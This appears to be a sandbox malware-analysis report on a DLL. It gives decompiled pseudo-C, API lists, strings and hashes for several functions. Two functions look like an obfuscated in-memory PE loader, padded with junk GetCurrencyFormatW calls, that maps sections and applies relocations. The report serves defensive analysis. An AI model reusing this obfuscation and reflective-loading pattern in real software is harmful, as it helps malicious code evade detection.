ConvertDefaultLocale.KERNEL32(?), ref: 10005F8D
GetProcAddress.KERNEL32(?,GetSystemDefaultUILanguage), ref: 10005FA1
ConvertDefaultLocale.KERNEL32(?), ref: 10005FC5
ConvertDefaultLocale.KERNEL32(000003FF), ref: 10005FCB
GetModuleFileNameA.KERNEL32(10000000,?,00000105), ref: 10006004
GetVersion.KERNEL32 ref: 10006019
RegOpenKeyExA.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,00020019,?), ref: 1000603E
RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,?,?), ref: 10006063
_sscanf.LIBCMT ref: 10006083
ConvertDefaultLocale.KERNEL32(?), ref: 100060B8
ConvertDefaultLocale.KERNEL32(76C84EE0), ref: 100060BE
RegCloseKey.ADVAPI32(?), ref: 100060CD
GetModuleHandleA.KERNEL32(ntdll.dll), ref: 100060DD
EnumResourceLanguagesA.KERNEL32 ref: 100060F8
ConvertDefaultLocale.KERNEL32(?), ref: 10006129
ConvertDefaultLocale.KERNEL32(76C84EE0), ref: 1000612F
_memset.LIBCMT ref: 10006149

Strings

Control Panel\Desktop\ResourceLocale, xrefs: 10006031
GetUserDefaultUILanguage, xrefs: 10005F46
GetSystemDefaultUILanguage, xrefs: 10005F8F
ntdll.dll, xrefs: 100060D8
kernel32.dll, xrefs: 10005F30

Memory Dump Source

Source File: 00000000.00000002.261026626.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.261016412.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261059914.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261070847.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261084766.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261094429.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261123235.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261144537.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261192986.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261207792.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd

Similarity

API ID: ConvertDefaultLocale$Module$AddressHandleProc$CloseEnumFileH_prolog3LanguagesNameOpenQueryResourceValueVersion_memset_sscanf
String ID: Control Panel\Desktop\ResourceLocale$GetSystemDefaultUILanguage$GetUserDefaultUILanguage$kernel32.dll$ntdll.dll
API String ID: 434808117-483790700
Opcode ID: 368d1d919a1a639eff12c1c674209e918f78b3616a3622e04850d242e1eb4b18
Instruction ID: 371a1abfdbbeaae06af34074570e4e6b8653269969333db2bd091179cc2368d9
Opcode Fuzzy Hash: 368d1d919a1a639eff12c1c674209e918f78b3616a3622e04850d242e1eb4b18
Instruction Fuzzy Hash: 22818FB5D002299FEB11DFA5DC84AFFBAF5EB48351F20452AE944E7280D7789A44CB60

Uniqueness

Uniqueness Score: -1.00%

Function 10002482 Relevance: 42.3, APIs: 21, Strings: 3, Instructions: 327
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 97%

			E10002482(intOrPtr* _a4) {
				int _v4;
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				void* __ebx;
				signed int _t117;
				signed int _t125;
				signed int _t150;
				signed int _t159;
				signed int _t160;
				signed int _t171;
				short* _t178;
				short* _t222;
				void* _t223;

				_t223 =  &_v40;
				_t178 = L"xadqsavcbdfewescGADW";
				_t222 = L"eofgerDSQWzbxberfjXFSqwaKLIOrtyZD";
				_v24 =  *(GetCurrencyFormatW(0, 0x11d4, _t222, 0, _t178, 0x22b9) *  *0x100440e0 * 0xf8 +  *_a4 + 0x14) & 0x0000ffff;
				_v24 = GetCurrencyFormatW(0, 0x11d4, _t222, 0, _t178, 0x22b9) *  *0x100440d0 * 0x28 + _v24;
				_v40 = GetCurrencyFormatW(0, 0x11d4, _t222, 0, _t178, 0x22b9) *  *0x100440e0 + _v24 +  *_a4 + 0x18;
				if(( *0x10046ab4 & 0x00000001) == 0) {
					 *0x10046ab4 =  *0x10046ab4 | 0x00000001;
					 *0x10046ab0 = GetCurrencyFormatW(0, 0x11d4, _t222, 0, _t178, 0x22b9) *  *0x100440e0;
				}
				_v20 = GetCurrencyFormatW(0, 0x11d4, _t222, 0, _t178, 0x22b9) *  *0x100440d0 +  *0x10046ab0 |  *(_v40 + 8);
				_v16 = E10001DB6(_v20, GetCurrencyFormatW(0, 0x11d4, _t222, 0, _t178, 0x22b9) *  *0x100440d4 +  *((intOrPtr*)(_a4 + 0x3c)));
				_v24 = E100021CE(_a4, GetCurrencyFormatW(0, 0x11d4, _t222, 0, _t178, 0x22b9) *  *0x100440d8 * 0x28 + _v40);
				_t117 = GetCurrencyFormatW(0, 0x11d4, _t222, 0, _t178, 0x22b9);
				_v40 = _v40 + 0x28;
				_v8 =  *(_v40 + 0x24);
				_v12 = _v24 + _t117 *  *0x100440d8;
				_v4 = 0;
				_v32 = 1;
				if(GetCurrencyFormatW(0, 0x11d4, _t222, 0, _t178, 0x22b9) *  *0x100440d0 + ( *( *_a4 + 6) & 0x0000ffff) <= 1) {
					L13:
					_v4 = 1;
					_t125 = E1000227A( &_v20, _a4);
					asm("sbb eax, eax");
					return  ~( ~_t125);
				} else {
					do {
						_v24 = GetCurrencyFormatW(0, 0x11d4, _t222, 0, _t178, 0x22b9) *  *0x100440e0 +  *(_v40 + 8);
						_v24 = GetCurrencyFormatW(0, 0x11d4, _t222, 0, _t178, 0x22b9) *  *0x100440d8 +  *0x10046ab0 | _v24;
						_v36 = E10001DB6(GetCurrencyFormatW(0, 0x11d4, _t222, 0, _t178, 0x22b9) *  *0x100440d8 +  *0x10046ab0 | _v24,  *((intOrPtr*)(_a4 + 0x3c)));
						_v28 = E100021CE(_a4, GetCurrencyFormatW(0, 0x11d4, _t222, 0, _t178, 0x22b9) *  *0x100440d0 * 0x28 + _v40);
						_v28 = _v28 + GetCurrencyFormatW(0, 0x11d4, _t222, 0, _t178, 0x22b9) *  *0x100440d0;
						if(_v16 == _v36 || _v12 + _v20 > GetCurrencyFormatW(0, 0x11d4, _t222, 0, _t178, 0x22b9) *  *0x100440e0 + _v36) {
							if(( *(_v40 + 0x24) & GetCurrencyFormatW(0, 0x11d4, _t222, 0, _t178, 0x22b9) *  *0x100440e0 + 0x02000000) == 0) {
								L10:
								_t150 = GetCurrencyFormatW(0, 0x11d4, _t222, 0, _t178, 0x22b9) *  *0x100440d0 - 0x02000001 & ( *(_v40 + 0x24) | _v8);
								L11:
								_v8 = _t150;
								_v12 = GetCurrencyFormatW(0, 0x11d4, _t222, 0, _t178, 0x22b9) *  *0x100440e0 - _v20 + _v28 + _v24;
								goto L12;
							}
							_t159 = GetCurrencyFormatW(0, 0x11d4, _t222, 0, _t178, 0x22b9);
							_t160 = _v8;
							if((_t160 & _t159 *  *0x100440e0 + 0x02000000) == 0) {
								goto L10;
							}
							_t150 = _t160 |  *(_v40 + 0x24);
							goto L11;
						} else {
							if(E1000227A(_t223 + 0x28 + GetCurrencyFormatW(0, 0x11d4, _t222, 0, _t178, 0x22b9) *  *0x100440d8 * 0x14, _a4) == 0) {
								return 0;
							}
							_v20 = _v24;
							_v16 = _v36;
							_t171 = GetCurrencyFormatW(0, 0x11d4, _t222, 0, L"xadqsavcbdfewescGADW", 0x22b9);
							_t178 = L"xadqsavcbdfewescGADW";
							_v12 = _t171 *  *0x100440e0 + _v28;
							_v8 =  *(_v40 + 0x24);
						}
						L12:
						_v32 = _v32 + 1;
						_v40 = _v40 + 0x28;
					} while (_v32 < GetCurrencyFormatW(0, 0x11d4, _t222, 0, _t178, 0x22b9) *  *0x100440d0 + ( *( *_a4 + 6) & 0x0000ffff));
					goto L13;
				}
			}

0x10002482
0x10002494
0x1000249c
0x100024d0
0x100024f0
0x10002512
0x10002516
0x10002518
0x10002534
0x10002534
0x10002567
0x10002593
0x100025bf
0x100025c3
0x100025d9
0x100025e4
0x100025ee
0x100025f2
0x100025f6
0x10002616
0x1000283b
0x10002843
0x1000284b
0x10002852
0x00000000
0x1000261c
0x1000261c
0x10002644
0x10002662
0x1000267a
0x100026a6
0x100026c1
0x100026c5
0x10002787
0x100027b7
0x100027dc
0x100027de
0x100027ea
0x10002803
0x00000000
0x10002803
0x10002795
0x100027a0
0x100027ac
0x00000000
0x00000000
0x100027b2
0x00000000
0x100026f2
0x1000271a
0x00000000
0x1000285f
0x10002731
0x1000273c
0x10002740
0x1000274d
0x10002752
0x1000275d
0x1000275d
0x10002807
0x10002807
0x1000280b
0x10002831
0x00000000
0x1000261c

APIs

GetCurrencyFormatW.KERNEL32 ref: 100024AA
GetCurrencyFormatW.KERNEL32 ref: 100024D4
GetCurrencyFormatW.KERNEL32 ref: 100024F4
GetCurrencyFormatW.KERNEL32 ref: 1000252B

Part of subcall function 10001DB6: GetCurrencyFormatW.KERNEL32 ref: 10001DCE

GetCurrencyFormatW.KERNEL32 ref: 10002545
GetCurrencyFormatW.KERNEL32 ref: 1000256B
GetCurrencyFormatW.KERNEL32 ref: 10002597
GetCurrencyFormatW.KERNEL32 ref: 100025C3
GetCurrencyFormatW.KERNEL32 ref: 100025FE
GetCurrencyFormatW.KERNEL32 ref: 10002628
GetCurrencyFormatW.KERNEL32 ref: 10002648
GetCurrencyFormatW.KERNEL32 ref: 1000267E

Part of subcall function 100021CE: GetCurrencyFormatW.KERNEL32 ref: 100021FF
Part of subcall function 100021CE: GetCurrencyFormatW.KERNEL32 ref: 10002222

GetCurrencyFormatW.KERNEL32 ref: 100026AA
GetCurrencyFormatW.KERNEL32 ref: 100026D7
GetCurrencyFormatW.KERNEL32 ref: 100026FE
GetCurrencyFormatW.KERNEL32 ref: 10002740
GetCurrencyFormatW.KERNEL32 ref: 10002772
GetCurrencyFormatW.KERNEL32 ref: 10002795
GetCurrencyFormatW.KERNEL32 ref: 100027C3
GetCurrencyFormatW.KERNEL32 ref: 100027EE
GetCurrencyFormatW.KERNEL32 ref: 1000281C

Strings

xadqsavcbdfewescGADW, xrefs: 10002494, 10002499, 100024C9, 100024E9, 10002524, 1000253E, 10002560, 1000258C, 100025B8, 100025E3, 10002621, 1000263D, 10002673, 1000269F, 100026D0, 100026F7, 10002729, 1000274D, 1000276B, 1000278E, 100027BC, 100027E3, 10002815
(, xrefs: 1000280B
eofgerDSQWzbxberfjXFSqwaKLIOrtyZD, xrefs: 10002486, 1000249C, 100024A1, 100024CC, 100024EC, 10002527, 10002541, 10002563, 1000258F, 100025BB, 100025EB, 10002624, 10002640, 10002676, 100026A2, 100026D3, 100026FA, 10002730, 1000276E, 10002791, 100027BF, 100027E6, 10002818

Memory Dump Source

Source File: 00000000.00000002.261026626.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.261016412.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261059914.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261070847.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261084766.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261094429.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261123235.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261144537.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261192986.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261207792.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd

Similarity

API ID: CurrencyFormat
String ID: ($eofgerDSQWzbxberfjXFSqwaKLIOrtyZD$xadqsavcbdfewescGADW
API String ID: 3383288267-2712681272
Opcode ID: e752a4a7a8a42b0df952e79aab9ae48840a3d500f4805a10681732b9bc365d18
Instruction ID: aca6d6cc97a103aa38e8287a4bdca31c23581297dae163bc22dbee5c6a0af23b
Opcode Fuzzy Hash: e752a4a7a8a42b0df952e79aab9ae48840a3d500f4805a10681732b9bc365d18
Instruction Fuzzy Hash: 5DB16975648354BFE308CB50CD86F1BBBE8EB8AB48F11180EF7449A2D1C771E9508B65

Uniqueness

Uniqueness Score: -1.00%

Function 10026012 Relevance: 42.1, APIs: 19, Strings: 5, Instructions: 109
libraryloadermemoryCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 91%

			E10026012(void* __ebx) {
				void* __edi;
				void* __esi;
				_Unknown_base(*)()* _t7;
				long _t10;
				void* _t11;
				int _t12;
				void* _t18;
				intOrPtr _t21;
				long _t26;
				void* _t30;
				struct HINSTANCE__* _t37;
				void* _t40;
				void* _t42;

				_t30 = __ebx;
				_t37 = GetModuleHandleA("KERNEL32.DLL");
				if(_t37 != 0) {
					 *0x10048dc8 = GetProcAddress(_t37, "FlsAlloc");
					 *0x10048dcc = GetProcAddress(_t37, "FlsGetValue");
					 *0x10048dd0 = GetProcAddress(_t37, "FlsSetValue");
					_t7 = GetProcAddress(_t37, "FlsFree");
					__eflags =  *0x10048dc8;
					_t40 = TlsSetValue;
					 *0x10048dd4 = _t7;
					if( *0x10048dc8 == 0) {
						L6:
						 *0x10048dcc = TlsGetValue;
						 *0x10048dc8 = E10025CC9;
						 *0x10048dd0 = _t40;
						 *0x10048dd4 = TlsFree;
					} else {
						__eflags =  *0x10048dcc;
						if( *0x10048dcc == 0) {
							goto L6;
						} else {
							__eflags =  *0x10048dd0;
							if( *0x10048dd0 == 0) {
								goto L6;
							} else {
								__eflags = _t7;
								if(_t7 == 0) {
									goto L6;
								}
							}
						}
					}
					_t10 = TlsAlloc();
					__eflags = _t10 - 0xffffffff;
					 *0x10045960 = _t10;
					if(_t10 == 0xffffffff) {
						L15:
						_t11 = 0;
						__eflags = 0;
					} else {
						_t12 = TlsSetValue(_t10,  *0x10048dcc);
						__eflags = _t12;
						if(_t12 == 0) {
							goto L15;
						} else {
							E10020E51();
							 *0x10048dc8 = E10025BFA( *0x10048dc8);
							 *0x10048dcc = E10025BFA( *0x10048dcc);
							 *0x10048dd0 = E10025BFA( *0x10048dd0);
							 *0x10048dd4 = E10025BFA( *0x10048dd4);
							_t18 = E10023E72();
							__eflags = _t18;
							if(_t18 == 0) {
								L14:
								E10025CFC();
								goto L15;
							} else {
								_push(E10025E88);
								_t21 =  *((intOrPtr*)(E10025C66( *0x10048dc8)))();
								__eflags = _t21 - 0xffffffff;
								 *0x1004595c = _t21;
								if(_t21 == 0xffffffff) {
									goto L14;
								} else {
									_t42 = E1002695E(1, 0x214);
									__eflags = _t42;
									if(_t42 == 0) {
										goto L14;
									} else {
										_push(_t42);
										_push( *0x1004595c);
										__eflags =  *((intOrPtr*)(E10025C66( *0x10048dd0)))();
										if(__eflags == 0) {
											goto L14;
										} else {
											_push(0);
											_push(_t42);
											E10025D39(_t30, _t37, _t42, __eflags);
											_t26 = GetCurrentThreadId();
											 *(_t42 + 4) =  *(_t42 + 4) | 0xffffffff;
											 *_t42 = _t26;
											_t11 = 1;
										}
									}
								}
							}
						}
					}
					return _t11;
				} else {
					E10025CFC();
					return 0;
				}
			}

0x10026012
0x1002601e
0x10026022
0x10026042
0x1002604f
0x1002605c
0x10026061
0x10026063
0x1002606a
0x10026070
0x10026075
0x1002608d
0x10026092
0x1002609c
0x100260a6
0x100260ac
0x10026077
0x10026077
0x1002607e
0x00000000
0x10026080
0x10026080
0x10026087
0x00000000
0x10026089
0x10026089
0x1002608b
0x00000000
0x00000000
0x1002608b
0x10026087
0x1002607e
0x100260b1
0x100260b7
0x100260ba
0x100260bf
0x10026191
0x10026191
0x10026191
0x100260c5
0x100260cc
0x100260ce
0x100260d0
0x00000000
0x100260d6
0x100260d6
0x100260ec
0x100260fc
0x1002610c
0x10026119
0x1002611e
0x10026123
0x10026125
0x1002618c
0x1002618c
0x00000000
0x10026127
0x10026127
0x10026138
0x1002613a
0x1002613d
0x10026142
0x00000000
0x10026144
0x10026150
0x10026152
0x10026156
0x00000000
0x10026158
0x10026158
0x10026159
0x1002616d
0x1002616f
0x00000000
0x10026171
0x10026171
0x10026173
0x10026174
0x1002617b
0x10026181
0x10026185
0x10026189
0x10026189
0x1002616f
0x10026156
0x10026142
0x10026125
0x100260d0
0x10026195
0x10026024
0x10026024
0x1002602c
0x1002602c

APIs

GetModuleHandleA.KERNEL32(KERNEL32.DLL,?,100207BA,?,?,00000001,?,?,1002092A,00000001,?,?,10041328,0000000C,100209E4,?), ref: 10026018
__mtterm.LIBCMT ref: 10026024

Part of subcall function 10025CFC: __decode_pointer.LIBCMT ref: 10025D0D
Part of subcall function 10025CFC: TlsFree.KERNEL32(00000020,10020856,?,?,00000001,?,?,1002092A,00000001,?,?,10041328,0000000C,100209E4,?), ref: 10025D27

GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 1002603A
GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 10026047
GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 10026054
GetProcAddress.KERNEL32(00000000,FlsFree), ref: 10026061
TlsAlloc.KERNEL32(?,?,00000001,?,?,1002092A,00000001,?,?,10041328,0000000C,100209E4,?), ref: 100260B1
TlsSetValue.KERNEL32(00000000,?,?,00000001,?,?,1002092A,00000001,?,?,10041328,0000000C,100209E4,?), ref: 100260CC
__init_pointers.LIBCMT ref: 100260D6
__encode_pointer.LIBCMT ref: 100260E1
__encode_pointer.LIBCMT ref: 100260F1
__encode_pointer.LIBCMT ref: 10026101
__encode_pointer.LIBCMT ref: 10026111
__decode_pointer.LIBCMT ref: 10026132
__calloc_crt.LIBCMT ref: 1002614B
__decode_pointer.LIBCMT ref: 10026165
__initptd.LIBCMT ref: 10026174
GetCurrentThreadId.KERNEL32 ref: 1002617B

Strings

FlsAlloc, xrefs: 10026034
FlsFree, xrefs: 10026056
KERNEL32.DLL, xrefs: 10026013
FlsSetValue, xrefs: 10026049
FlsGetValue, xrefs: 1002603C

Memory Dump Source

Source File: 00000000.00000002.261026626.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.261016412.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261059914.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261070847.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261084766.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261094429.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261123235.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261144537.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261192986.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261207792.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd

Similarity

API ID: AddressProc__encode_pointer$__decode_pointer$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__initptd__mtterm
String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
API String ID: 2657569430-3819984048
Opcode ID: 032371d8d2054dcfaa9331f682b7adc651e4b7ec3922b6df847e9872986f5f56
Instruction ID: 704b4601cb084f4dd452549cd158f7ffd0a67ac7cd9a7aed0fe10d7678a8cbb0
Opcode Fuzzy Hash: 032371d8d2054dcfaa9331f682b7adc651e4b7ec3922b6df847e9872986f5f56
Instruction Fuzzy Hash: 8631A435D02321AEF751EF74AD8490F3BE5EB56252B504926F401C72F2EB329940CF58

Uniqueness

Uniqueness Score: -1.00%

Function 1001E144 Relevance: 42.0, APIs: 12, Strings: 12, Instructions: 44
registryclipboardCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E1001E144(intOrPtr* __ecx) {
				intOrPtr* _t27;

				_t27 = __ecx;
				 *_t27 = RegisterClipboardFormatA("Native");
				 *((intOrPtr*)(_t27 + 4)) = RegisterClipboardFormatA("OwnerLink");
				 *((intOrPtr*)(_t27 + 8)) = RegisterClipboardFormatA("ObjectLink");
				 *((intOrPtr*)(_t27 + 0xc)) = RegisterClipboardFormatA("Embedded Object");
				 *((intOrPtr*)(_t27 + 0x10)) = RegisterClipboardFormatA("Embed Source");
				 *((intOrPtr*)(_t27 + 0x14)) = RegisterClipboardFormatA("Link Source");
				 *((intOrPtr*)(_t27 + 0x18)) = RegisterClipboardFormatA("Object Descriptor");
				 *((intOrPtr*)(_t27 + 0x1c)) = RegisterClipboardFormatA("Link Source Descriptor");
				 *((intOrPtr*)(_t27 + 0x20)) = RegisterClipboardFormatA("FileName");
				 *((intOrPtr*)(_t27 + 0x24)) = RegisterClipboardFormatA("FileNameW");
				 *((intOrPtr*)(_t27 + 0x28)) = RegisterClipboardFormatA("Rich Text Format");
				 *((intOrPtr*)(_t27 + 0x2c)) = RegisterClipboardFormatA("RichEdit Text and Objects");
				return _t27;
			}

0x1001e151
0x1001e15a
0x1001e163
0x1001e16d
0x1001e177
0x1001e181
0x1001e18b
0x1001e195
0x1001e19f
0x1001e1a9
0x1001e1b3
0x1001e1bd
0x1001e1c2
0x1001e1c9

APIs

RegisterClipboardFormatA.USER32 ref: 1001E153
RegisterClipboardFormatA.USER32 ref: 1001E15C
RegisterClipboardFormatA.USER32 ref: 1001E166
RegisterClipboardFormatA.USER32 ref: 1001E170
RegisterClipboardFormatA.USER32 ref: 1001E17A
RegisterClipboardFormatA.USER32 ref: 1001E184
RegisterClipboardFormatA.USER32 ref: 1001E18E
RegisterClipboardFormatA.USER32 ref: 1001E198
RegisterClipboardFormatA.USER32 ref: 1001E1A2
RegisterClipboardFormatA.USER32 ref: 1001E1AC
RegisterClipboardFormatA.USER32 ref: 1001E1B6
RegisterClipboardFormatA.USER32 ref: 1001E1C0

Strings

Embedded Object, xrefs: 1001E168
Rich Text Format, xrefs: 1001E1AE
Link Source Descriptor, xrefs: 1001E190
Native, xrefs: 1001E14C
ObjectLink, xrefs: 1001E15E
FileNameW, xrefs: 1001E1A4
OwnerLink, xrefs: 1001E155
RichEdit Text and Objects, xrefs: 1001E1B8
Object Descriptor, xrefs: 1001E186
Embed Source, xrefs: 1001E172
Link Source, xrefs: 1001E17C
FileName, xrefs: 1001E19A

Memory Dump Source

Source File: 00000000.00000002.261026626.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.261016412.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261059914.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261070847.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261084766.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261094429.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261123235.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261144537.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261192986.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261207792.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd

Similarity

API ID: ClipboardFormatRegister
String ID: Embed Source$Embedded Object$FileName$FileNameW$Link Source$Link Source Descriptor$Native$Object Descriptor$ObjectLink$OwnerLink$Rich Text Format$RichEdit Text and Objects
API String ID: 1228543026-2889995556
Opcode ID: 0e86c2709f0b9af3b7d061cab64bc5c46ce0e33a6718d2d0bc984e8fe3a0ba64
Instruction ID: 4b9fafc3805f733a061432fadfe8ab03a294f1ea68a7cded52070413de5cc64b
Opcode Fuzzy Hash: 0e86c2709f0b9af3b7d061cab64bc5c46ce0e33a6718d2d0bc984e8fe3a0ba64
Instruction Fuzzy Hash: 600144708007949ECB32EFB69C08C8BBAE5EED57117024D6EE2858F610E778E641CF84

Uniqueness

Uniqueness Score: -1.00%

Function 1000290C Relevance: 37.0, APIs: 19, Strings: 2, Instructions: 251
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E1000290C(signed int _a4, intOrPtr _a8) {
				intOrPtr _v4;
				unsigned int _v8;
				signed int _v12;
				intOrPtr _v16;
				int _v20;
				signed short* _v24;
				int _t73;
				intOrPtr* _t80;
				short* _t132;
				short* _t156;

				_t156 = L"xadqsavcbdfewescGADW";
				_t132 = L"eofgerDSQWzbxberfjXFSqwaKLIOrtyZD";
				_v16 =  *((intOrPtr*)(_a4 + 4));
				_v20 = GetCurrencyFormatW(0, 0x11d4, _t132, 0, _t156, 0x22b9) *  *0x100440d4;
				_v20 = GetCurrencyFormatW(0, 0x11d4, _t132, 0, _t156, 0x22b9) *  *0x100440dc + _v20;
				_t73 =  *_a4 + 0xa0 + (GetCurrencyFormatW(0, 0x11d4, _t132, 0, _t156, 0x22b9) *  *0x100440d0 + _v20) * 8;
				_v20 = _t73;
				if( *((intOrPtr*)(_t73 + 4)) != 0) {
					_a4 = GetCurrencyFormatW(0, 0x11d4, _t132, 0, _t156, 0x22b9) << 3;
					_t80 = (GetCurrencyFormatW(0, 0x11d4, _t132, 0, _t156, 0x22b9) + _a4) *  *0x100440d0 +  *_v20 + _v16;
					while(1) {
						_a4 = _t80;
						if( *_t80 <= 0) {
							break;
						}
						_v4 = GetCurrencyFormatW(0, 0x11d4, _t132, 0, _t156, 0x22b9) *  *0x100440d0 +  *_a4 + _v16;
						_v20 = GetCurrencyFormatW(0, 0x11d4, _t132, 0, _t156, 0x22b9) *  *0x100440e0 + 8;
						_v24 = _v20 + GetCurrencyFormatW(0, 0x11d4, _t132, 0, _t156, 0x22b9) *  *0x100440d4 * 2 + _a4;
						_v20 = 0;
						_v12 = GetCurrencyFormatW(0, 0x11d4, _t132, 0, _t156, 0x22b9) *  *0x100440e0 +  *((intOrPtr*)(_a4 + 4)) - 8 >> 1;
						if(GetCurrencyFormatW(0, 0x11d4, _t132, 0, _t156, 0x22b9) *  *0x100440e0 + _v12 == 0) {
							L7:
							_t80 = _a4 + GetCurrencyFormatW(0, 0x11d4, _t132, 0, _t156, 0x22b9) *  *0x100440dc +  *((intOrPtr*)(_a4 + 4));
							continue;
						} else {
							goto L4;
						}
						do {
							L4:
							_v12 = ( *_v24 & 0x0000ffff) >> GetCurrencyFormatW(0, 0x11d4, _t132, 0, _t156, 0x22b9) *  *0x100440d0 + 0xc;
							_v8 = GetCurrencyFormatW(0, 0x11d4, _t132, 0, _t156, 0x22b9) *  *0x100440d8 + 0x00000fff &  *_v24 & 0x0000ffff;
							if(_v12 == 3) {
								_v12 = GetCurrencyFormatW(0, 0x11d4, _t132, 0, _t156, 0x22b9) *  *0x100440d8 << 2;
								_v8 = GetCurrencyFormatW(0, 0x11d4, _t132, 0, _t156, 0x22b9) *  *0x100440d4 + _v12 + _v8 + _v4;
								 *_v8 =  *_v8 + GetCurrencyFormatW(0, 0x11d4, _t132, 0, _t156, 0x22b9) *  *0x100440d0 + _a8;
							}
							_v20 = _v20 + 1;
							GetCurrencyFormatW(0, 0x11d4, _t132, 0, _t156, 0x22b9);
							_v24 =  &(_v24[1]);
							_v8 = GetCurrencyFormatW(0, 0x11d4, _t132, 0, _t156, 0x22b9) *  *0x100440e0 +  *((intOrPtr*)(_a4 + 4)) - 8 >> 1;
						} while (_v20 < GetCurrencyFormatW(0, 0x11d4, _t132, 0, _t156, 0x22b9) *  *0x100440e0 + _v8);
						goto L7;
					}
					return 1;
				}
				return 0 | _a8 == 0x00000000;
			}

0x10002925
0x1000292d
0x1000293b
0x10002954
0x10002971
0x10002988
0x10002994
0x10002998
0x100029c3
0x100029da
0x10002bc6
0x10002bc9
0x10002bcd
0x00000000
0x00000000
0x10002a0e
0x10002a2a
0x10002a48
0x10002a52
0x10002a78
0x10002a89
0x10002ba6
0x10002bc4
0x00000000
0x00000000
0x00000000
0x00000000
0x10002a8f
0x10002a8f
0x10002abe
0x10002ade
0x10002ae2
0x10002b08
0x10002b2d
0x10002b44
0x10002b44
0x10002b46
0x10002b56
0x10002b58
0x10002b8b
0x10002b9c
0x00000000
0x10002a8f
0x00000000
0x10002bd5
0x00000000

APIs

GetCurrencyFormatW.KERNEL32 ref: 1000293F
GetCurrencyFormatW.KERNEL32 ref: 10002958
GetCurrencyFormatW.KERNEL32 ref: 10002975
GetCurrencyFormatW.KERNEL32 ref: 100029B2
GetCurrencyFormatW.KERNEL32 ref: 100029C7

Strings

xadqsavcbdfewescGADW, xrefs: 10002925, 1000292A, 1000294D, 1000296A, 100029AD, 100029B9, 100029E8, 10002A07, 10002A20, 10002A47, 10002A6B, 10002A94, 10002AB2, 10002AE9, 10002AFE, 10002B22, 10002B4F, 10002B62, 10002B7E, 10002BAB
